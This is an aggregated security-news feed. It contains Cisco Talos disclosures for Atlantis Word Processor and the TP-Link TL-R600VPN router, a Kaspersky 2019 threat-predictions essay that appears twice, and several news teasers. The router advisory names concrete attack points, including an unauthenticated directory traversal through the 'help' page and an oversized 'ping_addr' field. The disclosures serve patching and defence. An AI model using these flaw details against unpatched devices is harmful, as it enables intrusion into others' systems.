Vulnerability Spotlight: Multiple remote code execution vulnerabilities in Atlantis Word Processor


A member of Cisco Talos discovered these vulnerabilities.

Executive summary

Today, Cisco Talos is disclosing three remote code execution vulnerabilities in the Atlantis Word Processor. Atlantis Word Processor is a traditional word processor that provides a number of basic features for users, in line with what is in other similar types of software. This application is written in Delphi and keeps the majority of its capabilities in a single, relocatable binary. An attacker could exploit these vulnerabilities to corrupt the memory of the application, which can result in remote code execution under the context of the application.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Atlantis to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Atlantis Word Processor open document format NewAnsiString length remote code execution vulnerability (TALOS-2018-0711/CVE-2018-4038)

The word processor contains an exploitable arbitrary write vulnerability in the open document format parser while trying to null-terminate a string. A specially crafted document could allow an attacker to pass an untrusted value as a length to a constructor, which miscalculates a length and then uses it to calculate the position to write a null byte. This particular bug lies in the `NewAnsiString` function.

For more information on this vulnerability, read the full advisory here.

Atlantis Word Processor Huffman table code length remote code execution vulnerability (TALOS-2018-0712/CVE-2018-4039)

Atlantis Word Processor contains an out-of-bounds write vulnerability in its PNG implementation. When opening a specially crafted document, which would need to be supplied by an attacker, the application fingerprints it in order to determine the correct file format parser. Eventually, an attacker could corrupt memory, which would allow them to execute arbitrary code in the context of the application. A user only needs to open the document to trigger this vulnerability.

For more information on this vulnerability, read the full advisory here.

Atlantis Word Processor rich text format uninitialized TAutoList remote code execution vulnerability (TALOS-2018-0713/CVE-2018-4040)

An exploitable uninitialized pointer vulnerability exists in the rich text format parser of Atlantis Word Procesor. A specially crafted document can cause certain RTF tokens to dereference an uninitialized pointer and then write to it. When opening up an RTF document, the application will first fingerprint it in order to determine the correct file format parser. Eventually, this would corrupt the memory of the application, allowing a user to execute code in the context of the application.

For more information on this vulnerability, read the full advisory here.

Versions tested

Talos tested and confirmed that Atlantis Word Processor, version 3.2.7.2 is affected by these vulnerabilities.

Conclusion

All three of these vulnerabilities are triggered by the user opening a malicious, specially crafted document. The easiest way to avoid these issues is for the user to ensure that they don’t open any documents from untrusted sources. The latest update from Atlantis will also cover these vulnerabilities, as will the Snort rules listed below.


Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48385, 48386, 48389 - 48392

Attackers Target Drupal Web Servers with Chained Vulnerabilities

A recent attack targeted Drupal web servers with a chain of vulnerabilities that included the infamous Drupalgeddon2 and DirtyCOW flaws, Imperva security researchers say.

The attack was short and impacted only some Linux-based systems, but it was noteworthy for attempting to persistently infect vulnerable servers and take over machines.

read more

Securelist: Kaspersky Security Bulletin: Threat Predictions for 2019

There’s nothing more difficult than predicting. So, instead of gazing into a crystal ball, the idea here is to make educated guesses based on what has happened recently and where we see a trend that might be exploited in the coming months.

Asking the most intelligent people I know, and basing our scenario on APT attacks because they traditionally show the most innovation when it comes to breaking security, here are our main ‘predictions’ of what might happen in the next few months.

No more big APTs

What? How is it possible that in a world where we discover more and more actors every day the first prediction seems to point in the opposite direction?

The reasoning behind this is that the security industry has consistently discovered highly sophisticated government-sponsored operations that took years of preparation. What seems to be a logical reaction to that situation from an attacker’s perspective would be exploring new, even more sophisticated techniques that are much more difficult to discover and to attribute to specific actors.

Indeed, there are many different ways of doing this. The only requirement would be an understanding of the techniques used by the industry for attribution and for identifying similarities between different attacks and the artifacts used in them– something that doesn’t seem to be a big secret. With sufficient resources, a simple solution for an attacker could be having different ongoing sets of activity that are very difficult to relate to the same actor or operation. Well-resourced attackers could start new innovative operations while keeping their old ones alive. Of course, there’s still a good chance of the older operations being discovered, but discovering the new operations would pose a greater challenge.

Instead of creating more sophisticated campaigns, in some cases it appears to be more efficient for some very specific actors who have the capability to do so, to directly target infrastructure and companies where victims can be found, such as ISPs. Sometimes this can be accomplished through regulation, without the need for malware.

Some operations are simply externalized to different groups and companies that use different tools and techniques, making attribution extremely difficult. It’s worth keeping in mind that in the case of government-sponsored operations this ‘centrifugation’ of resources and talent might affect the future of such campaigns. Technical capabilities and tools are owned by the private industry in this scenario, and they are for sale for any customer that, in many cases, doesn’t fully understand the technical details and consequences behind them.

All this suggests that we’re unlikely to discover new highly sophisticated operations – well-resourced attackers are more likely to simply shift to new paradigms.

Networking hardware and IOT

It just seemed logical that at some point every actor would deploy capabilities and tools designed to target networking hardware. Campaigns like VPNFilter were a perfect example of how attackers have already started deploying their malware to create a multipurpose ‘botnet’. In this particular case, even when the malware was extremely widespread, it took some time to detect the attack, which is worrisome considering what might happen in more targeted operations.

Actually, this idea can go even further for well-resourced actors: why not directly target even more elemental infrastructure instead of just focusing on a target organization? We haven’t reached that level of compromise (to our knowledge), but it was clear from past examples (like Regin) how tempting that level of control is for any attacker.

Vulnerabilities in networking hardware allow attackers to follow different directions. They might go for a massive botnet-style compromise and use that network in the future for different goals, or they might approach selected targets for more clandestine attacks. In this second group we might consider ‘malware-less’ attacks, where opening a VPN tunnel to mirror or redirect traffic might provide all the necessary information to an attacker.

All these networking elements might also be part of the mighty IoT, where botnets keep growing at an apparently unstoppable pace. These botnets could be incredibly powerful in the wrong hands when it comes to disrupting critical infrastructure, for instance. This can be abused by well-resourced actors, possibly using a cover group, or in some kind of terror attack.

One example of how these versatile botnets can be used, other than for disruptive attacks, is in short-range frequency hopping for malicious communications, avoiding monitoring tools by bypassing conventional exfiltration channels.

Even though this seems to be a recurrent warning year after year, we should never underestimate IoT botnets – they keep growing stronger.

Public retaliation

One of the biggest questions in terms of diplomacy and geopolitics was how to deal with an active cyberattack. The answer is not simple and depends heavily on how bad and blatant the attack was, among many other considerations. However, it seems that after hacks like that on the Democratic National Committee, things became more serious.

Investigations into recent high-profile attacks, such as the Sony Entertainment Network hacks or the attack on the DNC, culminated in a list of suspects being indicted. That results not only in people facing trial but also a public show of who was behind the attack. This can be used to create a wave of opinion that might be part of an argument for more serious diplomatic consequences.

Actually we have seen Russia suffering such consequences as a result of their alleged interference in democratic processes. This might make others rethink future operations of this kind.

However, the fear of something like that happening, or the thought that it might already have happened, was the attackers’ biggest achievement. They can now exploit such fear, uncertainty and doubt in different, more subtle ways – something we saw in notable operations, including that of the Shadowbrokers. We expect more to come.

What will we see in the future? The propaganda waters were probably just being tested by past operations. We believe this has just started and it will be abused in a variety of ways, for instance, in false flag incidents like we saw with Olympic Destroyer, where it’s still not clear what the final objective was and how it might have played out.

Emergence of newcomers

Simplifying somewhat, the APT world seems to be breaking into two groups: the traditional well-resourced most advanced actors (that we predict will vanish) and a group of energetic newcomers who want to get in on the game.

The thing is that the entry barrier has never been so low, with hundreds of very effective tools, re-engineered leaked exploits and frameworks of all kinds publicly available for anyone to use. As an additional advantage, such tools make attribution nearly impossible and can be easily customized if necessary.

There are two regions in the world where such groups are becoming more prevalent: South East Asia and the Middle East. We have observed the rapid progression of groups suspected of being based in these regions, traditionally abusing social engineering for local targets, taking advantage of poorly protected victims and the lack of a security culture. However, as targets increase their defenses, attackers do the same with their offensive capabilities, allowing them to extend their operations to other regions as they improve the technical level of their tools. In this scenario of scripting-based tools we can also find emerging companies providing regional services who, despite OPSEC failures, keep improving their operations.

One interesting aspect worth considering from a more technical angle is how JavaScript post-exploitation tools might find a new lease of life in the short term, given the difficulty of limiting its functionality by an administrator (as opposed to PowerShell), its lack of system logs and its ability to run on older operating systems.

The negative rings

The year of Meltdown/Specter/AMDFlaws and all the associated vulnerabilities (and those to come) made us rethink where the most dangerous malware actually lives. And even though we have seen almost nothing in the wild abusing vulnerabilities below Ring 0, the mere possibility is truly scary as it would be invisible to almost all the security mechanisms we have.

For instance, in the case of SMM there has at least been a publicly available PoC since 2015. SMM is a CPU feature that would effectively provide remote full access to a computer without even allowing Ring 0 processes to have access to its memory space. That makes us wonder whether the fact that we haven’t found any malware abusing this so far is simply because it is so difficult to detect. Abusing this feature seems to be too good an opportunity to ignore, so we are sure that several groups have been trying to exploit such mechanisms for years, maybe successfully.

We see a similar situation with virtualization/hypervisor malware, or with UEFI malware. We have seen PoCs for both, and HackingTeam even revealed a UEFI persistence module that’s been available since at least 2014, but again no real ITW examples as yet.

Will we ever find these kinds of unicorns? Or haven’t they been exploited yet? The latter possibility seems unlikely.

Your favorite infection vector

In probably the least surprising prediction of this article we would like to say a few words about spear phishing. We believe that the most successful infection vector ever will become even more important in the nearest future. The key to its success remains its ability to spark the curiosity of the victim, and recent massive leaks of data from various social media platforms might help attackers improve this approach.

Data obtained from attacks on social media giants such as Facebook and Instagram, as well as LinkedIn and Twitter, is now available on the market for anyone to buy. In some cases, it is still unclear what kind of data was targeted by the attackers, but it might include private messages or even credentials. This is a treasure trove for social engineers, and could result in, for instance, some attacker using the stolen credentials of some close contact of yours to share something on social media that you already discussed privately, dramatically improving the chances of a successful attack.

This can be combined with traditional scouting techniques where attackers double-check the target to make sure the victim is the right one, minimizing the distribution of malware and its detection. In terms of attachments, it is fairly standard to make sure there is human interaction before firing off any malicious activity, thus avoiding automatic detection systems.

Indeed, there are several initiatives using machine learning to improve phishing’s effectiveness. It’s still unknown what the results would be in a real-life scenario, but what seems clear is that the combination of all these factors will keep spear phishing as a very effective infection vector, especially via social media in the months to come.

Destructive destroyer

Olympic destroyer was one of the most famous cases of potentially destructive malware during the past year, but many attackers are incorporating such capabilities in their campaigns on a regular basis. Destructive attacks have several advantages for attackers, especially in terms of creating a diversion and cleaning up any logs or evidence after the attack. Or simply as a nasty surprise for the victim.

Some of these destructive attacks have geostrategic objectives related to ongoing conflicts as we have seen in Ukraine, or with political interests like the attacks that affected several oil companies in Saudi Arabia. In some other cases they might be the result of hacktivism, or activity by a proxy group that’s used by a more powerful entity that prefers to stay in the shadows.

Anyway, the key to all these attacks is that they are ‘too good’ not to use. In terms of retaliation for instance, governments might use them as a response ranged somewhere between a diplomatic answer and an act of war, and indeed some governments are experimenting with them. Most of these attacks are planned in advance, which involves an initial stage of reconnaissance and intrusion. We don’t know how many potential victims are already in this situation where everything is ready, just waiting for the trigger to be pulled, or what else the attackers have in their arsenal waiting for the order to attack.

ICS environments and critical infrastructure are especially vulnerable to such attacks, and even though industry and governments have put a lot of effort in over the last few years to improve the situation, things are far from ideal. That’s why we believe that even though such attacks will never be widespread, in the next year we expect to see some occurring, especially in retaliation to political decisions.

Advanced supply chain

This is one of the most worrisome vectors of attack, which has been successfully exploited over the last two years, and it has made everyone think about how many providers they have and how secure they are. Well, there is no easy answer to this kind of attack.

Even though this is a fantastic vector for targeting a whole industry (similar to watering hole attacks) or even a whole country (as seen with NotPetya), it’s not that good when it comes to more targeted attacks as the risk of detection is higher. We have also seen more indiscriminate attempts like injecting malicious code in public repositories for common libraries. The latter technique might be useful in very carefully timed attacks when these libraries are used in a very particular project, with the subsequent removal of the malicious code from the repository.

Now, can this kind of attack be used in a more targeted way? It appears to be difficult in the case of software because it will leave traces everywhere and the malware is likely to be distributed to several customers. It is more realistic in cases when the provider works exclusively for a specific customer.

What about hardware implants? Are they a real possibility? There has been some recent controversy about that. Even though we saw from Snowden’s leaks how hardware can be manipulated on its way to the customer, this does not appear to be something that most actors can do other than the very powerful ones. And even they will be limited by several factors.

However, in cases where the buyer of a particular order is known, it might be more feasible for an actor to try and manipulate hardware at its origin rather than on its way to the customer.

It’s difficult to imagine how all the technical controls in an industrial assembly line could be circumvented and how such manipulation could be carried out. We don’t want to discard this possibility, but it would probably entail the collaboration of the manufacturer.

All in all, supply chain attacks are an effective infection vector that we will continue to see. In terms of hardware implants we believe it is extremely unlikely to happen and if it does, we will probably never know….

And mobile

This is in every year’s predictions. Nothing groundbreaking is expected, but it’s always interesting to think about the two speeds for this slow wave of infections. It goes without saying that all actors have mobile components in their campaigns; it makes no sense only going for PCs. The reality is that we can find many examples of artifacts for Android, but also a few improvements in terms of attacking iOS.

Even though successful infections for iPhone requires concatenating several 0-days, it’s always worth remembering that incredibly well-resourced actors can pay for such technology and use it in critical attacks. Some private companies claim they can access any iPhone that they physically possess. Other less affluent groups can find some creative ways to circumvent security on such devices using, for instance, rogue MDM servers and asking targets through social engineering to use them in their devices, providing the attackers with the ability to install malicious applications.

It will be interesting to see if the boot code for iOS leaked at the beginning of the year will provide any advantage to the attackers, or if they’ll find new ways of exploiting it.

In any case, we don’t expect any big outbreak when it comes to mobile targeted malware, but we expect to see continuous activity by advanced attackers aimed at finding ways to access their targets’ devices.

The other things

What might attackers be thinking about in more futuristic terms? One of the ideas, especially in the military field, might be to stop using weak error-prone humans and replacing them with something more mechanical. With that in mind, and also thinking of the alleged GRU agents expelled from the Netherlands last April after trying to hack into the OPCW’s Wi-Fi network as an example, what about using drones instead of human agents for short-range hacking?

Or what about backdooring some of the hundreds of cryptocurrency projects for data gathering, or even financial gain?

Use of any digital good for money laundering? What about using in-game purchases and then selling such accounts later in the marketplace?

There are so many possibilities that predictions always fall short of reality. The complexity of the environment cannot be fully understood anymore, raising possibilities for specialist attacks in different areas. How can a stock exchange’s internal inter-banking system be abused for fraud? I have no idea, I don’t even know if such a system exists. This is just one example of how open to the imagination the attackers behind these campaigns are.

We are here to try and anticipate, to understand the attacks we don’t, and to prevent them from occurring in the future.

Full report “Kaspersky Security Bulletin: Threat Predictions for 2019” (English, PDF)



Securelist

Kaspersky Security Bulletin: Threat Predictions for 2019

There’s nothing more difficult than predicting. So, instead of gazing into a crystal ball, the idea here is to make educated guesses based on what has happened recently and where we see a trend that might be exploited in the coming months.

Asking the most intelligent people I know, and basing our scenario on APT attacks because they traditionally show the most innovation when it comes to breaking security, here are our main ‘predictions’ of what might happen in the next few months.

No more big APTs

What? How is it possible that in a world where we discover more and more actors every day the first prediction seems to point in the opposite direction?

The reasoning behind this is that the security industry has consistently discovered highly sophisticated government-sponsored operations that took years of preparation. What seems to be a logical reaction to that situation from an attacker’s perspective would be exploring new, even more sophisticated techniques that are much more difficult to discover and to attribute to specific actors.

Indeed, there are many different ways of doing this. The only requirement would be an understanding of the techniques used by the industry for attribution and for identifying similarities between different attacks and the artifacts used in them– something that doesn’t seem to be a big secret. With sufficient resources, a simple solution for an attacker could be having different ongoing sets of activity that are very difficult to relate to the same actor or operation. Well-resourced attackers could start new innovative operations while keeping their old ones alive. Of course, there’s still a good chance of the older operations being discovered, but discovering the new operations would pose a greater challenge.

Instead of creating more sophisticated campaigns, in some cases it appears to be more efficient for some very specific actors who have the capability to do so, to directly target infrastructure and companies where victims can be found, such as ISPs. Sometimes this can be accomplished through regulation, without the need for malware.

Some operations are simply externalized to different groups and companies that use different tools and techniques, making attribution extremely difficult. It’s worth keeping in mind that in the case of government-sponsored operations this ‘centrifugation’ of resources and talent might affect the future of such campaigns. Technical capabilities and tools are owned by the private industry in this scenario, and they are for sale for any customer that, in many cases, doesn’t fully understand the technical details and consequences behind them.

All this suggests that we’re unlikely to discover new highly sophisticated operations – well-resourced attackers are more likely to simply shift to new paradigms.

Networking hardware and IOT

It just seemed logical that at some point every actor would deploy capabilities and tools designed to target networking hardware. Campaigns like VPNFilter were a perfect example of how attackers have already started deploying their malware to create a multipurpose ‘botnet’. In this particular case, even when the malware was extremely widespread, it took some time to detect the attack, which is worrisome considering what might happen in more targeted operations.

Actually, this idea can go even further for well-resourced actors: why not directly target even more elemental infrastructure instead of just focusing on a target organization? We haven’t reached that level of compromise (to our knowledge), but it was clear from past examples (like Regin) how tempting that level of control is for any attacker.

Vulnerabilities in networking hardware allow attackers to follow different directions. They might go for a massive botnet-style compromise and use that network in the future for different goals, or they might approach selected targets for more clandestine attacks. In this second group we might consider ‘malware-less’ attacks, where opening a VPN tunnel to mirror or redirect traffic might provide all the necessary information to an attacker.

All these networking elements might also be part of the mighty IoT, where botnets keep growing at an apparently unstoppable pace. These botnets could be incredibly powerful in the wrong hands when it comes to disrupting critical infrastructure, for instance. This can be abused by well-resourced actors, possibly using a cover group, or in some kind of terror attack.

One example of how these versatile botnets can be used, other than for disruptive attacks, is in short-range frequency hopping for malicious communications, avoiding monitoring tools by bypassing conventional exfiltration channels.

Even though this seems to be a recurrent warning year after year, we should never underestimate IoT botnets – they keep growing stronger.

Public retaliation

One of the biggest questions in terms of diplomacy and geopolitics was how to deal with an active cyberattack. The answer is not simple and depends heavily on how bad and blatant the attack was, among many other considerations. However, it seems that after hacks like that on the Democratic National Committee, things became more serious.

Investigations into recent high-profile attacks, such as the Sony Entertainment Network hacks or the attack on the DNC, culminated in a list of suspects being indicted. That results not only in people facing trial but also a public show of who was behind the attack. This can be used to create a wave of opinion that might be part of an argument for more serious diplomatic consequences.

Actually we have seen Russia suffering such consequences as a result of their alleged interference in democratic processes. This might make others rethink future operations of this kind.

However, the fear of something like that happening, or the thought that it might already have happened, was the attackers’ biggest achievement. They can now exploit such fear, uncertainty and doubt in different, more subtle ways – something we saw in notable operations, including that of the Shadowbrokers. We expect more to come.

What will we see in the future? The propaganda waters were probably just being tested by past operations. We believe this has just started and it will be abused in a variety of ways, for instance, in false flag incidents like we saw with Olympic Destroyer, where it’s still not clear what the final objective was and how it might have played out.

Emergence of newcomers

Simplifying somewhat, the APT world seems to be breaking into two groups: the traditional well-resourced most advanced actors (that we predict will vanish) and a group of energetic newcomers who want to get in on the game.

The thing is that the entry barrier has never been so low, with hundreds of very effective tools, re-engineered leaked exploits and frameworks of all kinds publicly available for anyone to use. As an additional advantage, such tools make attribution nearly impossible and can be easily customized if necessary.

There are two regions in the world where such groups are becoming more prevalent: South East Asia and the Middle East. We have observed the rapid progression of groups suspected of being based in these regions, traditionally abusing social engineering for local targets, taking advantage of poorly protected victims and the lack of a security culture. However, as targets increase their defenses, attackers do the same with their offensive capabilities, allowing them to extend their operations to other regions as they improve the technical level of their tools. In this scenario of scripting-based tools we can also find emerging companies providing regional services who, despite OPSEC failures, keep improving their operations.

One interesting aspect worth considering from a more technical angle is how JavaScript post-exploitation tools might find a new lease of life in the short term, given the difficulty of limiting its functionality by an administrator (as opposed to PowerShell), its lack of system logs and its ability to run on older operating systems.

The negative rings

The year of Meltdown/Specter/AMDFlaws and all the associated vulnerabilities (and those to come) made us rethink where the most dangerous malware actually lives. And even though we have seen almost nothing in the wild abusing vulnerabilities below Ring 0, the mere possibility is truly scary as it would be invisible to almost all the security mechanisms we have.

For instance, in the case of SMM there has at least been a publicly available PoC since 2015. SMM is a CPU feature that would effectively provide remote full access to a computer without even allowing Ring 0 processes to have access to its memory space. That makes us wonder whether the fact that we haven’t found any malware abusing this so far is simply because it is so difficult to detect. Abusing this feature seems to be too good an opportunity to ignore, so we are sure that several groups have been trying to exploit such mechanisms for years, maybe successfully.

We see a similar situation with virtualization/hypervisor malware, or with UEFI malware. We have seen PoCs for both, and HackingTeam even revealed a UEFI persistence module that’s been available since at least 2014, but again no real ITW examples as yet.

Will we ever find these kinds of unicorns? Or haven’t they been exploited yet? The latter possibility seems unlikely.

Your favorite infection vector

In probably the least surprising prediction of this article we would like to say a few words about spear phishing. We believe that the most successful infection vector ever will become even more important in the nearest future. The key to its success remains its ability to spark the curiosity of the victim, and recent massive leaks of data from various social media platforms might help attackers improve this approach.

Data obtained from attacks on social media giants such as Facebook and Instagram, as well as LinkedIn and Twitter, is now available on the market for anyone to buy. In some cases, it is still unclear what kind of data was targeted by the attackers, but it might include private messages or even credentials. This is a treasure trove for social engineers, and could result in, for instance, some attacker using the stolen credentials of some close contact of yours to share something on social media that you already discussed privately, dramatically improving the chances of a successful attack.

This can be combined with traditional scouting techniques where attackers double-check the target to make sure the victim is the right one, minimizing the distribution of malware and its detection. In terms of attachments, it is fairly standard to make sure there is human interaction before firing off any malicious activity, thus avoiding automatic detection systems.

Indeed, there are several initiatives using machine learning to improve phishing’s effectiveness. It’s still unknown what the results would be in a real-life scenario, but what seems clear is that the combination of all these factors will keep spear phishing as a very effective infection vector, especially via social media in the months to come.

Destructive destroyer

Olympic destroyer was one of the most famous cases of potentially destructive malware during the past year, but many attackers are incorporating such capabilities in their campaigns on a regular basis. Destructive attacks have several advantages for attackers, especially in terms of creating a diversion and cleaning up any logs or evidence after the attack. Or simply as a nasty surprise for the victim.

Some of these destructive attacks have geostrategic objectives related to ongoing conflicts as we have seen in Ukraine, or with political interests like the attacks that affected several oil companies in Saudi Arabia. In some other cases they might be the result of hacktivism, or activity by a proxy group that’s used by a more powerful entity that prefers to stay in the shadows.

Anyway, the key to all these attacks is that they are ‘too good’ not to use. In terms of retaliation for instance, governments might use them as a response ranged somewhere between a diplomatic answer and an act of war, and indeed some governments are experimenting with them. Most of these attacks are planned in advance, which involves an initial stage of reconnaissance and intrusion. We don’t know how many potential victims are already in this situation where everything is ready, just waiting for the trigger to be pulled, or what else the attackers have in their arsenal waiting for the order to attack.

ICS environments and critical infrastructure are especially vulnerable to such attacks, and even though industry and governments have put a lot of effort in over the last few years to improve the situation, things are far from ideal. That’s why we believe that even though such attacks will never be widespread, in the next year we expect to see some occurring, especially in retaliation to political decisions.

Advanced supply chain

This is one of the most worrisome vectors of attack, which has been successfully exploited over the last two years, and it has made everyone think about how many providers they have and how secure they are. Well, there is no easy answer to this kind of attack.

Even though this is a fantastic vector for targeting a whole industry (similar to watering hole attacks) or even a whole country (as seen with NotPetya), it’s not that good when it comes to more targeted attacks as the risk of detection is higher. We have also seen more indiscriminate attempts like injecting malicious code in public repositories for common libraries. The latter technique might be useful in very carefully timed attacks when these libraries are used in a very particular project, with the subsequent removal of the malicious code from the repository.

Now, can this kind of attack be used in a more targeted way? It appears to be difficult in the case of software because it will leave traces everywhere and the malware is likely to be distributed to several customers. It is more realistic in cases when the provider works exclusively for a specific customer.

What about hardware implants? Are they a real possibility? There has been some recent controversy about that. Even though we saw from Snowden’s leaks how hardware can be manipulated on its way to the customer, this does not appear to be something that most actors can do other than the very powerful ones. And even they will be limited by several factors.

However, in cases where the buyer of a particular order is known, it might be more feasible for an actor to try and manipulate hardware at its origin rather than on its way to the customer.

It’s difficult to imagine how all the technical controls in an industrial assembly line could be circumvented and how such manipulation could be carried out. We don’t want to discard this possibility, but it would probably entail the collaboration of the manufacturer.

All in all, supply chain attacks are an effective infection vector that we will continue to see. In terms of hardware implants we believe it is extremely unlikely to happen and if it does, we will probably never know….

And mobile

This is in every year’s predictions. Nothing groundbreaking is expected, but it’s always interesting to think about the two speeds for this slow wave of infections. It goes without saying that all actors have mobile components in their campaigns; it makes no sense only going for PCs. The reality is that we can find many examples of artifacts for Android, but also a few improvements in terms of attacking iOS.

Even though successful infections for iPhone requires concatenating several 0-days, it’s always worth remembering that incredibly well-resourced actors can pay for such technology and use it in critical attacks. Some private companies claim they can access any iPhone that they physically possess. Other less affluent groups can find some creative ways to circumvent security on such devices using, for instance, rogue MDM servers and asking targets through social engineering to use them in their devices, providing the attackers with the ability to install malicious applications.

It will be interesting to see if the boot code for iOS leaked at the beginning of the year will provide any advantage to the attackers, or if they’ll find new ways of exploiting it.

In any case, we don’t expect any big outbreak when it comes to mobile targeted malware, but we expect to see continuous activity by advanced attackers aimed at finding ways to access their targets’ devices.

The other things

What might attackers be thinking about in more futuristic terms? One of the ideas, especially in the military field, might be to stop using weak error-prone humans and replacing them with something more mechanical. With that in mind, and also thinking of the alleged GRU agents expelled from the Netherlands last April after trying to hack into the OPCW’s Wi-Fi network as an example, what about using drones instead of human agents for short-range hacking?

Or what about backdooring some of the hundreds of cryptocurrency projects for data gathering, or even financial gain?

Use of any digital good for money laundering? What about using in-game purchases and then selling such accounts later in the marketplace?

There are so many possibilities that predictions always fall short of reality. The complexity of the environment cannot be fully understood anymore, raising possibilities for specialist attacks in different areas. How can a stock exchange’s internal inter-banking system be abused for fraud? I have no idea, I don’t even know if such a system exists. This is just one example of how open to the imagination the attackers behind these campaigns are.

We are here to try and anticipate, to understand the attacks we don’t, and to prevent them from occurring in the future.

Full report “Kaspersky Security Bulletin: Threat Predictions for 2019” (English, PDF)

Instagram Patched A Data Download Tool Bug That Exposed Users Passwords

Instagram seems to have followed its parent company as it endured another major problem affecting user accounts. Reportedly, Instagram has

Instagram Patched A Data Download Tool Bug That Exposed Users Passwords on Latest Hacking News.

Vulnerability Spotlight: Multiple remote vulnerabilities in TP-Link TL-R600VPN


Vulnerabilities discovered by Jared Rittle of Cisco Talos.

Cisco Talos is disclosing multiple vulnerabilities in the TP-Link TL-R600VPN router. TP-Link produces a number of different types of small and home office (SOHO) routers. Talos discovered several bugs in this particular router model that could lead to remote code execution.

Overview


There are two root causes of the vulnerabilities: a lack of input sanitisation and parsing errors. The lack of proper input sanitisation leads the vulnerabilities TALOS-2018-0617/18, which can be exploited without authentication. Parsing errors are responsible for the vulnerabilities TALOS-2018-0619/20. However, these can only be exploited with an authenticated session. The remote code execution is done under the context of HTTPD However, since the HTTPD process is running under root, an attacker can run code with elevated privileges.

All vulnerabilities were found on HWv3 FRNv1.3.0 and HWv2 FRNv1.2.3, except for TALOS 2018-0620, which was found only on HWv3 FRNv1.3.0.

TALOS-2018-0617 — TP-Link TL-R600VPN HTTP denial of service


An exploitable denial-of-service vulnerability exists in the URI-parsing function of the TP-Link TL-R600VPN HTTP server. If a directory traversal is attempted on any of the vulnerable pages (help, images, frames, dynaform, localization) and the requested page is a directory instead of a file, the web server will enter an infinite loop, making the management portal unavailable. This request doesn't need to be authenticated.

CVE: CVE-2018-3948

A full technical advisory is available here.

TALOS-2018-0618 — TP-Link TL-R600VPN HTTP server information disclosure


An exploitable information disclosure vulnerability exists in the HTTP server functionality of the TP-Link TL-R600VPN. A directory traversal vulnerability exists in the TP-Link TL-R600VPN in both authenticated and unauthenticated forms. If a standard directory traversal is used with a base page of 'help,' the traversal does not require authentication and can read any file on the system.

CVE: CVE-2018-3949

A full technical advisory is available here.

TALOS-2018-0619 — TP-Link TL-R600VPN HTTP server ping address remote code execution


An exploitable remote code execution vulnerability exists in the ping and traceroute functions of the TP-Link TL-R600VPN HTTP server. The router does not check the size of the data passed to its 'ping_addr' field when performing a ping operation. By sending a large amount of data to this field, an attacker could cause a stack-based buffer overflow, leading to remote code execution or a simple crash of the device's HTTP server. An attacker would need to be in an authenticated session to trigger this vulnerability.

CVE: CVE-2018-3950

A full technical advisory is available here.

TALOS-2018-0620 — TP-Link TL-R600VPN HTTP server fs directory remote code execution


An exploitable remote code execution vulnerability exists in the HTTP header-parsing function of the TP-Link TL-R600VPN HTTP server. A specially crafted HTTP request can cause a buffer overflow, resulting in remote code execution on the device. During this process, the server calculates the length of the user-controlled HTTP header buffer and adds the value to the input buffer offset. This creates an overflow condition when the router processes a longer-than-expected GET request. An attacker needs to be authenticated to be able to trigger this vulnerability.

CVE: CVE-2018-3951

A full technical advisory is available here.

Discussion


Over the past year, Talos has disclosed various vulnerabilities in internet-of-things (IoT) devices and SOHO routers. These are just the latest example that these pieces of equipment are not only vulnerable, they also lack the generic operating systems protections that mitigate vulnerabilities like buffer overflows. Fortunately in the case of TL-R600VPN routers, the critical vulnerabilities that lead remote code execution need authentication. However, the code could be executed with root privileges.


Coverage


The following Snort IDs have been released to detect these vulnerabilities:

Vovox Data Exposure: 26 Million SMS Texts; Two Factor Codes, Phone Numbers And More

Vovox has reportedly exposed over 26 million texts belonging to its customers which include Microsoft, Amazon, and Google. The Big

Vovox Data Exposure: 26 Million SMS Texts; Two Factor Codes, Phone Numbers And More on Latest Hacking News.

Hackers May Exploit Microsoft PowerPoint For Malware Attacks

Microsoft Office tools, particularly, the Word, Excel, and PowerPoint, have always enticed criminal hackers due to their popularity among the

Hackers May Exploit Microsoft PowerPoint For Malware Attacks on Latest Hacking News.

An iPhone X Vulnerability Allows Hackers To Access Deleted Pictures

Recently, two researchers have demonstrated how an iPhone X vulnerability that could allow an attacker to access deleted pictures. iPhone

An iPhone X Vulnerability Allows Hackers To Access Deleted Pictures on Latest Hacking News.

Children’s Smartwatch Vulnerability Allows Hackers To Stalk and Talk To Your Kids

Child-tracking smartwatches provide a convenient means of monitoring a child’s safety for parents. However, if the devices have security flaws,

Children’s Smartwatch Vulnerability Allows Hackers To Stalk and Talk To Your Kids on Latest Hacking News.

Windows 10 October Update Brings Back Old Mapped Drives Bug

After a lot of chaos and problems, Microsoft has resumed the Windows 10 1809 rollout. While the recent October update

Windows 10 October Update Brings Back Old Mapped Drives Bug on Latest Hacking News.

Adobe Patch Tuesday November Fixed Multiple Information Disclosure Vulnerabilities

This week, Adobe released its monthly scheduled update bundle addressing vulnerabilities within its different products. The Adobe patch Tuesday November

Adobe Patch Tuesday November Fixed Multiple Information Disclosure Vulnerabilities on Latest Hacking News.

CVSS Scores Often Misleading for ICS Vulnerabilities: Experts

While the Common Vulnerability Scoring System (CVSS) can be useful for rating vulnerabilities, the scores assigned to flaws affecting industrial control systems (ICS) may be misleading, which can have negative consequences for organizations, particularly if they rely solely on CVSS for prioritizing patches.

read more

The Art and Science of Secure Coding: Key Practices that Stand Out

Flaws in code lines, file system and data input methods make up the core security vulnerability of any application. This is what we address through secure coding practices. Secure coding guidelines stand out as the last battling army before the enemy line of security risks and threats. Basically, secure coding practices will make developers more […]… Read More

The post The Art and Science of Secure Coding: Key Practices that Stand Out appeared first on The State of Security.

Report: Small, Stealthy Groups Behind Worst Cybercrimes

A small group of cybercriminals are responsible for the most damaging cyberattacks--often with the help of state sponsorship. Still, low-level criminal activity on the dark web still poses the most widespread and immediate security threat, with cryptocurrency mining, ransomware and malware all on the rise, a recent report has found.

The post ...

Read the whole entry... »

Related Stories

Google Went Down After Facing BGP Mishap

On Monday, numerous Internet users in the USA faced trouble after Google went down for over an hour. Upon scratching

Google Went Down After Facing BGP Mishap on Latest Hacking News.

OPM Security Improves, But Many Issues Still Unresolved: GAO

The U.S. Office of Personnel Management (OPM) has improved its security posture since the data breaches disclosed in 2015, but many issues are still unresolved, according to a report published this week by the Government Accountability Office (GAO).

read more

